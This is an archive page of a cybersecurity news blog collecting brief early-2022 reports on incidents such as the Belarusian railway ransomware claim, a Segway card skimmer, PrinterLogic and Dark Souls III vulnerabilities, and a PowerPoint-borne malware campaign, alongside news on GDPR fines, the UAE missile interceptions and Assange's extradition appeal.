Sunday, January 19, 2025
Home Blog Page 52

Hacktivists Claim Ransomware Strike on Belarus Railway Intended to Disrupt Russian Forces

By
Steven Black (n0tst3)
-
0

As the political crisis in Ukraine deepens, warfare is evolving with the times. Hacktivism is not dead, although it hasn’t been in the news quite as much as financially driven ransomware incidents these past few years.

In an apparent bid to stop a Russian arms build-up near the Ukrainian border, a “pro-democracy” hacktivist group claims to have hacked the Belarusian railway system—allegedly one of the conduits for tanks and weaponry into the region. The incident comes as Russian and NATO-allied forces continue to spar over the political future of Ukraine, heightening the risk of war.

Belarus, which sits to the north of Ukraine, is considered a key Kremlin ally in the ongoing conflict and has seen an accumulation of Russian soldiers and weaponry as the two nations prepare for upcoming joint military exercises. U.S. commentators have accused Russia of using Belarus and the exercises as an excuse to “encircle” Ukraine militarily.

In a post to its Telegram page on Monday, the hacktivist group known as Cyber Partisans claimed to have struck the nation’s railway system—apparently spiking it with ransomware as a way to deter further transfers of arms. The hackers also published images of what they said were files compromised in the attack, and demanded the release of numerous “political prisoners,” which they said had been illegitimately incarcerated by the government.

“The government continues to suppress the free will of Belarusians, imprison innocent people, they continue to unlawfully keep… thousands of political prisoners,” the hackers told Ars Technica. They also decried the government for allowing “occupying troops” into their land—ostensibly a reference to Russia.

Partisans, which calls itself “pro-democracy,” is reputed to be comprised of disaffected Belarusian security personnel and has previously been tied to alleged hack-and-leak operations targeted at the government of President Alexander Lukashenko—the country’s current leader.

One of the first to spot the apparent railway hack was Franak Viačorka, a journalist and political advisor to Belarusian opposition leader and “pro-democracy activist” Sviatlana Tsikhanouskaya.

Twt Franak Viačorka

Viacorka, who has also worked with the Atlantic Council and is a media analyst for the US Agency for Global Media, told Gizmodo that he had learned about the cyberattack directly from “railroad workers.” Viacorka called the “scale” of the attack “huge,” and said that he expects there to be an “official statement” soon on the incident, as “some railroad services don’t work.”

While there doesn’t appear to be any official acknowledgment of the attack by the Belarusian government, a railway notification to travelers on Monday announced that certain “technical” difficulties were causing problems for electronic service delivery:

“For technical reasons, reference web-resources of the Belarusian Railways and services for issuing electronic travel documents are temporarily unavailable,” the railway announced. “To arrange travel and return electronic travel documents, please contact the ticket office.”

While this alone doesn’t confirm the hacktivists’ claims, it certainly sounds like one of the classic side-effects of a ransomware attack.

The ongoing standoff in Ukraine between Russian and pro-NATO forces has gotten to the point where, some say, political squabbles risk devolving into armed confrontation. The buildup of 100,000 Russian troops at Ukraine’s border has heightened tensions and led American officials to accuse Putin of wanting to invade the neighboring country.

More relevantly, multiple cyberattacks have targeted Ukraine over the past two weeks—a fact that has added to the growing conflict. This includes a Jan. 14 defacement attack on nearly 80 Ukrainian government websites, which was blamed on hackers connected to Belarusian intelligence. This makes the timing of the railway incident—a little over a week later—somewhat interesting.

On their Telegram page Monday, Cyber Partisans wrote that they had hacked the railway system to defy Belarusian President Lukashenko, who they dubbed a “terrorist”:

BelZhD at the command of the terrorist Lukashenko these days allows the occupying troops to enter our land. As part of the “Peklo” cyber campaign, we encrypted the bulk of the servers, databases and workstations of the BelZhD in order to slow down and disrupt the operation of the road. The backups have been destroyed.

The hackers claimed that “automation and security systems were deliberately NOT affected by a cyber attack in order to avoid emergency situations.”

You may also enjoy reading, Assange Wins First Stage in Effort to Appeal US Extradition

source

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Bookmark
Please login to bookmarkClose

California public office data breach

By
Steven Black (n0tst3)
-
0
databreach

Some citizens’ personal information was available to view online

A misconfigured database managed by a California public office has potentially exposed the sensitive medical information of citizens.

County of Kings, in mid-California, announced that the security flaw in its public webserver made limited information on Covid-19 cases available on the internet.

The incident was discovered on November 24, 2021, and involved records obtained by the County’s Public Health Department from the California Department of Public Health and County healthcare providers.

An investigation determined that the misconfiguration resulted from an error made by a third-party contractor and existed on the county’s public webserver from February 15, 2021, until it was fully corrected on December 6, 2021.

In a notice (PDF) posted online, County of Kings said that names, dates of birth, addresses, and Covid-19-related health information was among the datasets available to view.

The government department said it has “no reason to believe that individuals’ information has been or will be misused”, but has informed all potential victims by post.

It added that no further action needs to be taken by the individuals, but has set up a dedicated call center, details of which can be found in the notice.

You may also enjoy reading, Assange Wins First Stage in Effort to Appeal US Extradition

source

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Remember, CyberSecurity Starts With You!

  • Globally, 30,000 websites are hacked daily.
  • 64% of companies worldwide have experienced at least one form of a cyber attack.
  • There were 20M breached records in March 2021.
  • In 2020, ransomware cases grew by 150%.
  • Email is responsible for around 94% of all malware.
  • Every 39 seconds, there is a new attack somewhere on the web.
  • An average of around 24,000 malicious mobile apps are blocked daily on the internet.
Bookmark
Please login to bookmarkClose

Segway website hacked and infected with payment card skimmer

By
Steven Black (n0tst3)
-
0
data breach

Hackers have breached the Segway website and placed malicious code on its online store to collect payment card details from online shoppers.

“The website was compromised at least since January 6th,” antivirus maker Malwarebytes said on Monday.

The security firm said the attack was still ongoing at the time it published its blog post and security alert.

A spokesperson from Segway did not return a request for comment, but an inspection of the store’s source code suggests the company has removed the malicious code.

Segway website hacked and malicous codea added

In a technical report on Monday, Malwarebytes said the attackers breached Segway’s Magento-based online store and then added a piece of JavaScript to the site that loaded malicious code from the booctstrap[.]com domain.

This code would activate when users would visit the store’s checkout page, collect information entered in the payment form, and send the data to a remote server.

Segway.com wiki
Segway WiKi

The Malwarebytes Threat Intelligence Team said they linked the code to a threat actor known as Magecart Group 12.

Active since September 2018, this threat actor has been linked to several security incidents, including the compromise of Adverline, a French advertising agency, from where it used its ads to place card-stealing code on hundreds of other sites and the hack of re-seller of tickets for the Tokyo Olympics.

Based on its telemetry data, Malwarebytes said that most users who visited the compromised Segway site during the past three weeks were based in Australia and the US.

You may also enjoy reading, Assange Wins First Stage in Effort to Appeal US Extradition

source

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Bookmark
Please login to bookmarkClose

PrinterLogic RCE: vendor addresses triple threat against all connected endpoints

By
Steven Black (n0tst3)
-
0

PrinterLogic has released security updates to address a total of nine vulnerabilities in Web Stack and Virtual Appliance, including three security defects that carry “high severity” ratings.

Tracked as CVE-2021-42631, CVE-2021-42635, and CVE-2021-42638, the three high-risk bugs can be exploited launch remote code execution attacks, according to an advisory from the Paranoids vulnerability research team.

All three security flaws carry a CVSS base score of 8.1, but each is a different type of vulnerability: CVE-2021-42631 is an object injection bug, CVE-2021-42635 is a hardcoded APP_KEY issue, while CVE-2021-42638 is described as miscellaneous command injections.

To resolve these issues, PrinterLogic reorganized the impacted endpoints to eliminate the use of objects passed as parameters, modified the installers so that random keys would be generated, and completely removed areas affected by the command injections (where removal was not possible, escaping/sanitation was addressed).

The remaining security holes include: SQLi may disclose audit logs (CVE-2021-42633), blind SSRF (CVE-2021-42637), miscellaneous reflected XSS (CVE-2021-42639), driver assignment IDOR (CVE-2021-42640), username/email info disclosure (CVE-2021-42641), and printer console username/password info disclosure (CVE-2021-42642).

The Paranoids researchers noted that the majority of PrinterLogic installations are not directly accessible from the Internet.

“That means attackers would first need a privileged network position — such as access through a VPN or another (SSRF, perhaps) vulnerability in an appliance on the edge — to exploit the PrinterLogic Web Stack server,” the researchers explained.

The vulnerabilities impact all PrinterLogic Web Stack version 19.1.1.13 SP9 and earlier, and Virtual Appliance version 20.0.1304 and earlier, when used with macOS or Linux endpoint client software.

PrinterLogic Web Stack version 19.1.1.13-SP10 includes the necessary patches, but no client software updates are required for Virtual Appliance. In a separate advisory, PrinterLogic also notes that patches were automatically pushed to its SaaS platform worldwide.

You may also enjoy reading, Assange Wins First Stage in Effort to Appeal US Extradition

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Bookmark
Please login to bookmarkClose

Critical RCE in Dark Souls III Videogame, says Kaspersky

By
Steven Black (n0tst3)
-
0

Dangerous vulnerability was discovered in Dark Souls III videogame that can be used to gain control of a gamer’s computer.

The gaming community is discussing a recent vulnerability in the Dark Souls III videogame. This RCE vulnerability allows attackers to remotely execute arbitrary code on a victim’s computer.

Apparently, the vulnerability also affects earlier games in the Dark Soul series: because of this, the developers have taken the unusual step of temporarily deactivating PvP servers across Dark Souls Remastered, Dark Souls II, and Dark Souls III.

According to the developers, they also plan to turn off servers for Dark Souls: Prepare To Die as well. Players fear that the same vulnerability could also affect the upcoming Elden Ring game, which is thought to use the same infrastructure. The bug is relevant only for PC users, so Xbox and PlayStation are unaffected.

Why Dark Souls vulnerability is so dangerous

This vulnerability allows an attacker to execute almost any program on the victim’s computer, so they’re able to steal confidential data or execute any program they wish (including installing malware).

You can find a demonstration of the exploit in the Twitch stream of the player named The_Grim_Sleeper in which an unknown person launched a PowerShell script on the streamer’s computer that used the Windows Narrator engine to read out critical notes about the gameplay.

What is the chance that Dark Souls vulnerability will be exploited ITW?

The details of the exploit for this vulnerability are not available to the general public, at least not yet. Despite the ethically dubious way of drawing attention to the problem, the person behind the attack apparently was not trying to cause any real harm. Judging by the discussion in the Dark Souls community, the creator of the exploit has been trying to inform the game’s developers about this serious vulnerability for some time, but they had ignored his messages. That’s why he decided to hack a popular streamer right during the streaming session.

However, this information is not 100% reliable, in reality everything may not be so straight-forward. For example, the creator of the exploit has already shared information about the vulnerability with the developers of the Blue Sentinel plugin, a mod for Dark Souls designed to counteract cheats. And one can only guess who else could get this information. Also, once demonstrated, other hackers may try to replicate the exploit and use it to cause real harm to players. There are various possible scenarios here: attackers can use it to steal passwords from game accounts or crypto wallets, install good old ransomware, hidden miners, and much more.

How to stay safe from Dark Souls vulnerability?

Apparently, FromSoftware is currently trying to solve the problem. Let’s hope they can fix the vulnerability quickly. However, in the meantime, we recommend using high-quality security solutions for each device. Thanks to a special gaming mode, our antiviruses protect against all kinds of threats, including the exploitation of vulnerabilities, while consuming a minimum of PC resources and without interfering with the gameplay.

source

You may also enjoy reading, Assange Wins First Stage in Effort to Appeal US Extradition

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Bookmark
Please login to bookmarkClose

UAE Intercepts 2 Ballistic Missiles Targeting Abu Dhabi

By
Steven Black (n0tst3)
-
0

The United Arab Emirates has intercepted two ballistic missiles targeting Abu Dhabi, the country’s defence ministry has said.

Yemen’s Houthi rebels claimed responsibility for the offensive, saying they targeted al-Dhafra Air Base and other areas in the Emirati capital – along with sites in the Dubai region and the Saudi areas of Jizan and Asir.

Houthi military spokesman Yehia Sarei warned that the UAE would continue to be a target “as long as attacks on the Yemeni people continue”.

This is the rebels’ second assault on Abu Dhabi in a week following unprecedented drone strikes that killed three people last Monday.

© Reuters Remains of a ballistic missile intercepted in an industrial area are seen in Saudi Arabia

The UAE is part of a Saudi-led coalition that has been at war with the Iran-backed Houthis for more than six years and was believed to be responsible for airstrikes that killed more than 80 people last week.

The Emirati defence ministry said the missiles were destroyed and there were no casualties.

Videos on social media appeared to show the sky light up before sunrise on Monday, with interceptor missiles moving through clouds to target the incoming fire.

Two explosions were later heard through the city and the missile fragments fell harmlessly to the ground, the state-run WAM news agency said.

The Emirati defence ministry tweeted out a black-and-white video that it said showed an F-16 striking the ballistic missile launcher used in the attack.

The site was identified as being near al-Jawaf, a Yemeni province around 1,400km southwest of Abu Dhabi.

On Sunday night, Saudi Arabia’s state media said the country had intercepted a missile and the fragments fell and injured two foreign nationals, causing damage in an industrial area near a southern region.

The Emirati defence ministry said it is “ready to deal with any threats” and “takes all necessary measures to protect the state from all attacks”.

At Al-Dhafra, which hosts both American and British forces, US personnel took shelter in bunkers during the attack, the US Air Force’s Mideast command said.

Traffic was disrupted into Abu Dhabi International Airport for about an hour after the attack.

The US embassy in Abu Dhabi later issued a security alert to Americans living in the UAE, telling citizens to “maintain a high level of security awareness”.

Instructions were provided on how to cope with missile attacks, which is previously unheard of given the UAE’s popularity as a safe tourist destination.

In a televised address, Houthi military spokesman Yehia Sarei said: “We warn foreign companies and investors to leave the Emirates.

“This has become an unsafe country.”

source

You may also enjoy reading, Assange Wins First Stage in Effort to Appeal US Extradition

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Bookmark
Please login to bookmarkClose

GDPR Fines Surged Sevenfold to $1.25 Billion in 2021: Study

By
Steven Black (n0tst3)
-
0

Fines issued for GDPR non-compliance increased sevenfold from 2020 to 2021, analysis shows

In its latest annual GDPR summary, international law firm DLA Piper focuses attention in two areas: fines imposed and the evolving effect of the Schrems II ruling of 2020. Fines are increasing and Schrems II issues are becoming more complex.

GDPR fines

Fines issued for GDPR non-compliance increased significantly (sevenfold) in 2021, from €158.5 million (approximately $180 million) in 2020 to just under €1.1 billion (approximately $1.25 billion) in 2021. The largest fines came from Luxembourg against Amazon (€746 million / $846 million), and Ireland against WhatsApp (€225 million / $255 million). Both are currently being appealed.

The WhatsApp fine is interesting. The original fine proposed by the Irish Data Protection Commission (DPC) was for €30 million to €50 million. However, other European regulators objected, and the European Data Processing Board (EDPB) adjudicated – instructing Ireland to increase the fine by 350%. 

This is exactly the process activist Max Schrems is hoping for (actually, expecting) in his case in Ireland against Facebook. The Irish DPC has stated that Facebook is not contravening GDPR. Schrems believes that the other European regulators will object, and the EDPB will overturn the Irish decision.

The process illustrates the GDPR ‘one-stop shop’ principle in action. It is designed to prevent companies from, looking for adjudication in countries with a history of lenient fines. One ruling covers the entire European Union, but other regulators can object to the ruling.

The DLA Piper report (PDF) also highlights what appears to be a divergence of approach between different European regulators. Some countries prefer a smaller number of large fines, while others seem to prefer a large number of small fines. This may, however, be influenced by the European headquarters location of the tech giants likely to attract the larger fines: WhatsApp, owned by Facebook, is headquartered in Ireland, while Amazon is headquartered in Luxembourg.

The report suggests there will be “significantly more complaints, investigations and enforcement activity this year in relation to cookies and similar tracking technologies.” It notes that the My Privacy is None of Your Business (NOYB) organization has issued 500 complaints to organizations for alleged breaches of cookie requirements, threatening formal complaints if the alleged infringement isn’t remedied.

Schrems II

Much of the DLA Piper report examines the growing effect of the Schrems II ruling of 2020. “The decision of Europe’s highest court in Schrems II in July 2020 was seismic,” notes the report. “The CJEU invalidated the Privacy Shield regime and left standard contractual clauses on life support.”

Schrems II applies to data transfers from Europe to any third-party country. In reality, it will primarily affect data transfers between the EU and the U.S. involving the large U.S. tech giants (Facebook, Google, Amazon, Microsoft etcetera).

The heart of the ruling is simple to understand. GDPR states that European personal data may not be exported to any country that does not have GDPR equivalent privacy rules. The U.S. does not have equivalent security – but has been considered a special case because of the volume of data transfers between the two blocs. Hence the Privacy Shield fudge to legalize transfers.

The Schrems II ruling invalidated the Privacy Shield. The basis is that U.S. government access to European personal data via FISA 720 is a fundamental contravention of GDPR. The same principal applies to standard contractual clauses (SCCs) because it is difficult to imagine how ‘contracts’ with European companies can prevent a lawful FISA 720 U.S. demand for access.

Technical measures to protect the data are still a possibility, but difficult in practice. Encryption could prevent U.S. government access, but only if the decryption keys cannot also be demanded by the government. This would require the company to have no access to the keys; but this would mean that without its own access it would not be able to process the data, and there would be little value to it.

The most obvious solution would be European localization of data – that is, for data collectors to keep the data on servers within the EU. However, this is also now questionable. In March 2021, a French court rejected a claim against the collection of COVID-19 data on an EU-hosted server that ultimately belonged to a U.S. company. The court ruled that in this case there were adequate provisions to protect the data.

Significantly, however, it also added that U.S. extra-territorial access to data held by U.S. companies is relevant to GDPR. “The ruling,” says DLA Piper, “implies that merely localizing and ring-fencing personal data in Europe may not be sufficient where the service provider is subject to extra-territorial laws that may result in access to personal data by public authorities in third countries; additional safeguards may be necessary to prevent access.”

Industry is still largely in a ‘wait and see’ phase over Schrems II. Neither EU governments nor the U.S. government wish to damage trade between the two blocs, and are both waiting to see how the problem plays out in the courts. Noticeably, there have been no Schrems II fines yet issued.

This cannot continue indefinitely. One month after the Schrems II judgment, Max Schrems raised 101 Schrems II-related complaints via the NOYB organization. These are now playing out in various courts. The Schrems versus Facebook case in Ireland is one example. The Google Analytics decision by the Austrian regulator (probably arriving too late for inclusion in DLA Piper’s report) is a second. More will follow – and there is no easy solution for business.

“Meeting the requirements of Schrems II and the EDPB recommendations is a challenge even for the most sophisticated and well-resourced organizations,” says the report, “and is beyond the means of many small and medium-sized enterprises.”

At a time of rising GDPR fines, Schrems II puts EU/U.S. data transfers between a rock (GDPR) and a hard place (FISA 720). GDPR is unlikely to be amended; FISA 720 is unlikely to be rescinded. For now, it is difficult to see any solution outside of new technical developments and business practices.

You may also enjoy reading, Assange Wins First Stage in Effort to Appeal US Extradition

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Bookmark
Please login to bookmarkClose

PowerPoint Files Used To Push Remote Access Trojans (RAT)

By
Steven Black (n0tst3)
-
0

Since December 2021, a growing trend in phishing campaigns has emerged that uses malicious PowerPoint documents to distribute various types of malware, including remote access and information-stealing trojans.

According to a report by Netskope’s Threat Labs shared with Bleeping Computer before publication, the actors are using PowerPoint files combined with legitimate cloud services that host the malware payloads.

The families deployed in the tracked campaign are Warzone (aka AveMaria) and AgentTesla, two powerful RATs and info-stealers that target many applications, while the researchers also noticed the dropping of cryptocurrency stealers.

Sliding malware into Windows devices

The malicious PowerPoint phishing attachment contains obfuscated macro executed via a combination of PowerShell and MSHTA, both built-in Windows tools.

The VBS script is then de-obfuscated and adds new Windows registry entries for persistence, leading to the execution of two scripts. The first one fetches AgentTesla from an external URL, and the second disables Windows Defender.

VBS execution stages
Source: Netskope

Additionally, the VBS creates a scheduled task that executes a script every hour, which fetches a PowerShell cryptocurrency stealer from a Blogger URL.

Blogger page abused for dropping payloads
Source: Netskope

The malware payloads

AgentTesla is a .NET-based RAT (remote access trojan) that can steal browser passwords, log keystrokes, steal clipboard contents, etc.

It is executed by PowerShell and comes slightly obfuscated, while there’s also a function that injects the payload into an instance of “aspnet_compiler.exe”.

PowerShell that executes AgentTesla
Source: Netskope

The second payload delivered in this campaign is Warzone, also a RAT, but Netskope doesn’t give many details about it in the report.

The cryptocurrency stealer is the third payload of this campaign, which checks the clipboard data with a regex that matches cryptocurrency wallet patterns. If found, it replaces the recipient’s address with one under the actor’s control.

The stealer supports Bitcoin, Ethereum, XMR, DOGE, and more. Netskope has published the complete list of IoCs (indicators of compromise) for this campaign, including all wallets used by the actors on this GitHub page.

Some of the wallets that adversaries use for snatching crypto
Source: Netskope

PowerPoint becoming a problem

In December 2021, Fortinet reported about a similar DHL-themed campaign that also used PowerPoint documents to drop Agent Tesla.

Users must treat this document type with as much vigilance as they have when receiving Excel files since macro code in PP files can be equally as dangerous and catastrophic.

In this case, the actors also threw cloud services in the mix, hosting their malicious payloads on various legitimate platforms that are unlikely to raise any red flags with security tools.

As such, the most dependable protection measure is to handle all unsolicited communications with caution and also to keep macros on your Microsoft Office suite disabled.

source

You may also enjoy reading, Assange Wins First Stage in Effort to Appeal US Extradition

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Bookmark
Please login to bookmarkClose

Alleged carder gang mastermind and three acolytes under arrest in Russia

By
Steven Black (n0tst3)
-
0

Russian news agency Tass reported over the weekend that the “purported founder” of a notorious cybercrime group known as Infraud Organisation has been arrested

In February 2018, when the US Department of Justice (DOJ) unleashed indictments against 36 defendants alleged to be part of what the DOJ described at the time as:

[A] cybercriminal enterprise engaged in the large-scale acquisition, sale, and dissemination of stolen identities, compromised debit and credit cards, personally identifiable information, financial and banking information, computer malware, and other contraband.

As a side-effect of the American indictment, 13 people were arrested in seven different countries: Australia, France, Italy, Kosovo, Serbia, the UK and the US.

The DOJ claimed to have evidence at the time that Infraud Org, operating under the unrepentant motto In Fraud We Trust, was responsible for more than $500 million in actual losses, and more than $2 billion in what law enforcement referred to as “intended losses”.

The 36 defendants went by an eclectic range of online nicknames, including Best4BestGoldenshopGuapo1988MoneymafiaMoviestarRenegade11SecurerootSkizoValidshop and Zo0mer.

One of those indicted back in 2018 was a certain Andrey Sergeevich Novak, also known as Unicc, also known as Faaxxx, also known as Faxtrod.

Novak, claims this weekend’s Tass report, which quotes an “informed source”, is one of four suspects now under arrest in Russia.

He was allegedly arrested two months ago – the report implies that he’s still in custody – along with three other members of the group whom Tass describe as “detained under house arrest”. (We’re assuming that the US equivalent would be that Novak didn’t make bail, while the other three did.)

None of the latter three were listed by name in the 2018 US indictment, although six of the 36 defendants were entered simply as John Doe, US jargon for “name unknown”.

“The investigation continues,” states Tass, “to establish the other members of the international hacking group.”

You may also enjoy reading, Assange Wins First Stage in Effort to Appeal US Extradition

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Bookmark
Please login to bookmarkClose

Assange Wins First Stage in Effort to Appeal US Extradition

By
Steven Black (n0tst3)
-
5

WikiLeaks founder  Julian Assange on Monday won the first stage of his effort to overturn a U.K. ruling that opened the door for his extradition to U.S. to stand trial on espionage charges.

Assange Wins First Stage

The High Court in London gave Assange permission to appeal the case to the U.K. Supreme Court. But the Supreme Court must agree to accept the case before it can move forward.

“Make no mistake, we won today in court,” Assange’s fiancee, Stella Moris, said outside the courthouse, noting that he remains in custody at Belmarsh Prison in London.

“We will fight this until Julian is free,” she added.

The Supreme Court normally takes about eight sitting weeks after an application is submitted to decide whether to accept an appeal, the court says on its website.

The decision is the latest step in Assange’s long battle to avoid a trial in the U.S. on a series of charges related to WikiLeaks’ publication of classified documents more than a decade ago.

Just over a year ago, a district court judge in London rejected a U.S. extradition request on the grounds that Assange was likely to kill himself if held under harsh U.S. prison conditions. U.S. authorities later provided assurances that the WikiLeaks founder wouldn’t face the severe treatment his lawyers said would put his physical and mental health at risk.

The High Court last month overturned the lower court’s decision, saying that the U.S. promises were enough to guarantee Assange would be treated humanely.

Those assurances were the focus of Monday’s ruling by the High Court.

Assange’s lawyers are seeking to appeal because the U.S. offered its assurances after the lower court made its ruling. But the High Court overturned the lower court ruling, saying that the judge should have given the U.S. the opportunity to offer the assurances before she made her final ruling.

The High Court gave Assange permission to appeal so the Supreme Court can decide “in what circumstances can an appellate court receive assurances from a requesting state … in extradition proceedings.”

Assange’s lawyers have argued that the U.S. government’s pledge that Assange won’t be subjected to extreme conditions is meaningless because it’s conditional and could be changed at the discretion of American authorities.

The U.S. has asked British authorities to extradite Assange so he can stand trial on 17 charges of espionage and one charge of computer misuse linked to WikiLeaks’ publication of thousands of leaked military and diplomatic documents.

Assange, 50, has been held at the high-security Belmarsh Prison since 2019, when he was arrested for skipping bail during a separate legal battle. Before that, he spent seven years holed up inside Ecuador’s Embassy in London. Assange sought protection in the embassy in 2012 to avoid extradition to Sweden to face allegations of rape and sexual assault.

Sweden dropped the sex crimes investigations in November 2019 because so much time had elapsed.

American prosecutors say Assange unlawfully helped U.S. Army intelligence analyst Chelsea Manning steal classified diplomatic cables and military files that WikiLeaks later published, putting lives at risk.

Lawyers for Assange argue that their client shouldn’t have been charged because he was acting as a journalist and is protected by the First Amendment of the U.S. Constitution that guarantees freedom of the press. They say the documents he published exposed U.S. military wrongdoing in Iraq and Afghanistan.

You may also enjoy reading, UK Psych Hospitals Using Covert Cameras In Patient Rooms

Got to Cybersecurity News

Go to Homepage

Go to Cybersecurity Academy

Stay informed of the latest Cybersecurity trends, threats and developments. Sign up for RiSec Weekly Cybersecurity Newsletter Today

Bookmark
Please login to bookmarkClose
1...515253...79Page 52 of 79

Editor Picks

Featured

Cyber Academy

ABOUT US

RiSec represents an autonomous, non-profit alliance comprising of individuals dedicated to enhancing cybersecurity awareness and education. Read more

Contact us: security@realinfosec.net

Social

Subscribe for weekly updates

Copyright © RiSec 2023 All rights reserved.
All trademarks, logos, images and brand names are the property of their respective owners.